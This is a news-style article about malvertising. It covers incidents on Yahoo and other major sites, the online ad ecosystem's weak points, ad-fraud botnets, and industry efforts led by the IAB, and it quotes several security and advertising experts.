Online ads can be annoying, but increasingly they're malicious, too. In the wake of a highly publicized "malvertising" incident last December, during which attackers were able to deliver malware through online ads published on Yahoo.com, that question is now top of mind for some.
That incident, in turn, came just a few months after security researchers at Blue Coat Systems discovered a group of sites that were delivering drive-by malvertising payloads through ads embedded in many "name brand" websites, including Salon.com and The Los Angeles Times.
The issue is starting to get high-level attention. A recent report (PDF) by the U.S. Senate said the problem endangers the security and privacy of users and recommended that the U.S. Federal Trade Commission should force the industry to offer better protections through comprehensive regulation.
But it is the advertising industry, rather than end users, that has the most to lose.
"As an industry we've been reluctant to talk about these problems in the past," says Steve Sullivan, former vice president of ad technology at the Interactive Advertising Bureau (IAB), a consortium of more than 600 online advertising media and technology companies. (Sullivan recently moved to fraud detection company White Ops.)
But over the past year, the problem has risen to a level where the hundreds of businesses that make up the online advertising ecosystem are both talking about it openly, and actively supporting the IAB's Trustworthy Digital Marketing Supply Chain. That effort, part of a five-year plan (PDF) announced by the IAB in February, could set the bar for best practices and require a level of oversight for all IAB members to help reduce the incidence of malvertising, fraud and other issues.
It's a pocketbook issue, Sullivan says. Most malvertising, he explains, is designed not to harm the individual consumer but instead to recruit personal computers and mobile devices into large-scale botnets used to generate revenue by producing false advertising impressions and clicks online. In the case of the Yahoo malware, users were redirected to domains related to Paid-To-Promote.net. "The real money," Sullivan says, "is in advertising fraud."
But malvertising is also used to steal user data, says Bogdan Botezatu, senior e-threat analyst at antivirus vendor Bitdefender. "Malvertising is one of the few techniques that allow cyber criminals to silently attack unsuspecting users."
If a user's machine is infected with a botnet designed for advertising fraud, the owner of that botnet may try to monetize it by offering to install other software -- in reality malware that steals the user's information -- on the infected computer, says Chris Larsen, research architect at security software vendor Blue Coat Systems. That's what happened with Crytolocker, which initially used spam to trick users into downloading it. "Then [the authors] shifted to underground forums and paid someone to install it on already infected computers," Larsen says.
A deep-rooted problem
Getting rid of malvertising won't be easy. One challenge lies with the structure and operational model of the online advertising ecosystem itself. It includes hundreds of players that sell services ranging from ad networks to advertiser-focused supply-side platforms, publisher-oriented demand-side platforms and ad exchanges -- open marketplaces where publishers sell inventory that advertisers can purchase.
Ad networks can also sell excess inventory through other networks and affiliates that in turn may work with other partners. Publishers -- and even the ad networks themselves -- don't always know who the buyers are.
It's an imperfect system, Sullivan says, but one that publishers must rely on to sell "remnant" inventory -- ad space that they can't sell themselves. "You either sell it to a network for a lower cost or you don't get anything at all. No one is immune to the problem," he explains. And in an opaque marketplace like an exchange, advertisers have no idea where their ad impressions are actually coming from. That makes it a target for advertising fraud.
The malvertising payload is delivered through advertising networks in various ways, which presents its own challenges to prevention. Cyber criminals tend to use three different approaches, says Sullivan. The most straightforward is for the malware distributor to simply buy ad inventory through an exchange and submit an ad with malware embedded within it.
That's hard to do today because many publishers and advertisers use tools that scan for malicious code and attempt to inspect references to other sites. "But it might not get caught if they've hidden it well," he says.